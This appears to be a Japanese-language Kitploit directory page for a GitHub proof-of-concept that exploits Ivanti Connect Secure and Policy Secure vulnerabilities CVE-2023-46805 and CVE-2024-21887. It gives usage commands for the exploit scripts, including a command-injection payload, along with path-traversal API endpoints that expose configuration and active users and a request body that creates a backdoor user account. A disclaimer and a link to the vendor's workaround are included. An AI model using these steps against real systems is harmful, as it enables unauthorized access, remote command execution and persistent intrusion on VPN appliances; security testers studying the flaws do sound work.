Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-46805_CVE-2024-21887 — Ivanti ICS 9.x、22.xおよびIvanti Policy SecureのWebコンポーネントにおける認証バイパスの脆弱性により、リモートの攻撃者が制御チェックを迂回して制限されたリソースにアクセスできる可能性があります。 | Kitploit
ツール/GitHubGitHub/duy-31/cve-2023-46805_cve-2024-21887
認証と認可脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubduy-31/cve-2023-46805_cve-2024-21887

CVE-2023-46805_CVE-2024-21887

Ivanti ICS 9.x、22.xおよびIvanti Policy SecureのWebコンポーネントにおける認証バイパスの脆弱性により、リモートの攻撃者が制御チェックを迂回して制限されたリソースにアクセスできる可能性があります。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
234112年前Kitploit レビュー済み

CVE-2023-46805

Ivanti ICS 9.x、22.x および Ivanti Policy Secure の Web コンポーネントにおける認証バイパスの脆弱性により、リモートの攻撃者が制御チェックをバイパスして制限されたリソースにアクセスできるようになります。

usage: ./CVE-2023-46805.sh http(s)://fqdn:port
./CVE-2023-46805.sh https://my.vpn.ip:443

image

注意事項: chmod +x CVE-2023-46805.sh
必要なアプリ: curl + json_pp

結果: 脆弱性がある場合、何かしらの出力が表示されるはずです:

image

CVE-2024-21887

Ivanti Connect Secure (9.x、22.x) および Ivanti Policy Secure の Web コンポーネントにおけるコマンドインジェクションの脆弱性により、認証された管理者が特別に細工されたリクエストを送信し、アプライアンス上で任意のコマンドを実行できるようになります。

  • PoCを実行します(2つのエントリポイントを試行します)

usage: ./CVE-2024-21887.sh http(s)://fqdn:port payload_cmd
./CVE-2024-21887.sh https://my.vpn.ip:443 "touch /tmp/pwned"

結果: 脆弱性がある場合、何かしらの出力が表示され、ペイロードが動作するはずです: image

注意事項: chmod +x CVE-2024-21887.sh
必要なアプリ: curl、xxd、tr、sed

有用な情報

/api/v1/totp/user-backup-code/../../configuration/system/configuration /api/v1/totp/user-backup-code/../../system/active-users

/api/v1/totp/user-backup-code/../../configuration/administrators/admin-realms/realm/Admin%20Users

  • アカウントを作成 /authentication/auth-servers/authserver/System%20Local/local/users/user

-H 'Content-Type:application/json' -d '{"change-password-at-signin": "false", "consoleaccess": "false", "enabled": "true", "fullname": "new user", "one-timeuse": "false", "password-cleartext": "new_password", "username": "login_user"}'



回避策/修正情報: https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US

謝辞: https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis


詳細はこちら ;) https://www.linkedin.com/in/duy-huan-bui/

⚠️ 免責事項: 重要: このスクリプトは教育、倫理的テスト、および合法的な使用のみを目的として提供されています。明示的な許可なくシステムやネットワークで使用しないでください。コンピュータシステムやネットワークへの不正アクセスは違法であり、無許可の活動を行ったユーザーは法的措置の対象となります。著者はこのスクリプトの誤用によるいかなる損害についても責任を負いません。

ツールをダウンロード